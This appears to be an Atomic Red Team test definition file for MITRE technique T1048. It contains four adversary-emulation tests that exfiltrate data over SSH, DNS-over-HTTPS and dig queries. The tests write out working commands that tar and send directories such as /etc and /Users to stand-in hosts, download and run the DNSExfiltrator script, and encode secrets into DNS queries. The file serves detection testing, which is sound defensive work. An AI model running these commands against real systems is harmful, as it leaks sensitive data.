attack_technique: T1048
display_name: Exfiltration Over Alternative Protocol
atomic_tests:
- name: Exfiltration Over Alternative Protocol - SSH
  auto_generated_guid: f6786cc8-beda-4915-a4d6-ac2f193bb988
  description: |
    Input a domain and test Exfiltration over SSH

    Remote to Local

    Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file.
  supported_platforms:
  - macos
  - linux
  input_arguments:
    domain:
      description: target SSH domain
      type: url
      default: target.example.com
  executor:
    command: |
      ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
    name: sh
- name: Exfiltration Over Alternative Protocol - SSH
  auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268
  description: |
    Input a domain and test Exfiltration over SSH

    Local to Remote

    Upon successful execution, tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output.
  supported_platforms:
  - macos
  - linux
  input_arguments:
    user_name:
      description: username for domain
      type: string
      default: atomic
    password:
      description: password for user
      type: string
      default: atomic
    domain:
      description: target SSH domain
      type: url
      default: target.example.com
  executor:
    command: |
      tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
    name: sh
- name: DNSExfiltration (doh)
  auto_generated_guid: c943d285-ada3-45ca-b3aa-7cd6500c6a48
  description: |
    DNSExfiltrator enables the transfer (exfiltration) of a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.
    !!! Test will fail without a domain under your control with A record and NS record !!! 
    See this github page for more details - https://github.com/Arno0x/DNSExfiltrator
  supported_platforms:
  - windows
  input_arguments:
    password:
      description: Password used to encrypt the data to be exfiltrated
      type: string
      default: atomic
    domain:
      description: The domain name to use for DNS requests
      type: string
      default: target.example.com
    ps_module:
      description: DNSExfiltrator powershell ps_module
      type: path
      default: 'PathToAtomicsFolder\..\ExternalPayloads\dnsexfil.ps1'
    doh:
      description: Google or CloudFlare DoH (DNS over HTTP) server
      type: string
      default: google
    time:
      description: The time in milliseconds to wait between each DNS request
      type: string
      default: "500"
    encoding:
      description: Set to '-b32' to use base32 encoding of data. Might be required by some DNS resolvers.
      type: string
      default:
  dependency_executor_name: powershell
  dependencies:
  - description: |
      DNSExfiltrator powershell file must exist on disk at specified location (#{ps_module})
    prereq_command: |
      if (Test-Path "#{ps_module}") {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
      IWR "https://raw.githubusercontent.com/Arno0x/DNSExfiltrator/8faa972408b0384416fffd5b4d42a7aa00526ca8/Invoke-DNSExfiltrator.ps1" -OutFile "#{ps_module}"
  executor:
    command: |
      Import-Module "#{ps_module}"
      Invoke-DNSExfiltrator -i "#{ps_module}" -d #{domain} -p #{password} -doh #{doh} -t #{time} #{encoding}
    name: powershell
- name: Exfiltrate Data using DNS Queries via dig
  auto_generated_guid: a27916da-05f2-4316-a3ee-feec67a437be
  description: |
    This test demonstrates how an attacker can exfiltrate sensitive information by encoding it as a subdomain (using base64 encoding) and 
    making DNS queries via the dig command to a controlled DNS server.
  supported_platforms:
    - macos
    - linux
  input_arguments:
    dns_port:
      type: integer
      default: '53'
      description: Attacker's DNS server port
    attacker_dns_server:
      type: string
      default: 8.8.8.8
      description: Attacker's DNS server address
    secret_info:
      type: string
      default: this is a secret info
      description: secret info that will be exfiltirated
  dependency_executor_name: bash
  dependencies:
    - description: dig command
      prereq_command: which dig
      get_prereq_command: |
        which apt && sudo apt update && sudo apt install -y bind9-dnsutils || which yum && sudo yum install -y bind-utils || which dnf && sudo dnf install -y bind-utils || which apk && sudo apk add bind-tools || which pkg && sudo pkg update && sudo pkg install -y bind-tools || which brew && brew update && brew install --quiet bind
  executor:
    command: |
      dig @#{attacker_dns_server} -p #{dns_port} $(echo "#{secret_info}" | base64).google.com
    name: bash
    elevation_required: false